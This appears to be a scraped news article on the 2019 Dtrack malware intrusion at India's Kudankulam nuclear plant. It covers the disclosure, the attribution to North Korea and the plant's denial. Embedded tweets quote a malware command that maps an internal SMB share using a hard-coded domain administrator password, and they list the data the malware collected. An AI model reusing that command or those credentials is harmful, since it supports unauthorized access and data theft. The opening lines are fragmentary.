The attack is being tied to North Korea.
The cyber attack targeted research and technical data and was focused on
The most powerful station in India, the Kudankulam Nuclear Power Plant, recently came under the target of a cyber attack.
The malware, which has been identified by researchers as North Korea's Dtrack, was reported by Pukhraj Singh - a cyber security professional, to have gained 'domain controller-level access' at Kudankulam. Dtrack is the same malware which was tied to North Korea's Lazarus threat group by researchers based on code shared with DarkSeoul. The malware attack wiped hard drives at South Korean media companies and banks in 2013.
Singh said that he was alerted of the malware by a 'third party', after which he alerted the National Cyber Security Coordinator on September 3. The attack targeted research and technical data and was focused on collection of technical information, using a Windows SMB network drive share with credentials hard-coded into the malware to aggregate files to steal.
So, it's public now. Domain controller-level access at Kudankulam Nuclear Power Plant. The government was notified way back. Extremely mission-critical targets were hit. https://t.co/rFaTeOsZrw pic.twitter.com/OMVvMwizSi
— Pukhraj Singh (@RungRage) October 28, 2019
However, the plant denied that it was a victim of the cyber attack and any cyber attack 'on the Nuclear Power Plant Control System is not possible'. The statement further said that the control systems network is isolated from the plant's administrative networks.Following their statement, Singh said that maybe they were confusing control systems with a domain controller. "They're different things," Singh tweeted.
Interesting potential DTRACK (CC @Mao_Ware )
Dumps the data mined output via manually mapped share over SMB to RFC1918 address with a statically encoded user/pass:
> net use \\\\10.38.1.35\\C$ su.controller5kk /user:KKNPP\\administrator
— ????????? (@a_tweeter_user) October 28, 2019
Attached pic is data collection from #KKNPP #Dtrack malware (a few other bits not pictured).
- Local IP, MAC, OS install information (including registered org) via registry
- Browser history
- Connectivity to local IP
- Compspec, ipconfig, netstat info
via @a_tweeter_user https://t.co/7LqEhNOom2 pic.twitter.com/qKIVzvbQbV
— Kevin Perlow (@KevinPerlow) October 28, 2019
According to research, instead of attacking the nuclear infrastructures and controllers directly, the attack targeted and aimed to steal information. It is unclear how much information was actually stolen.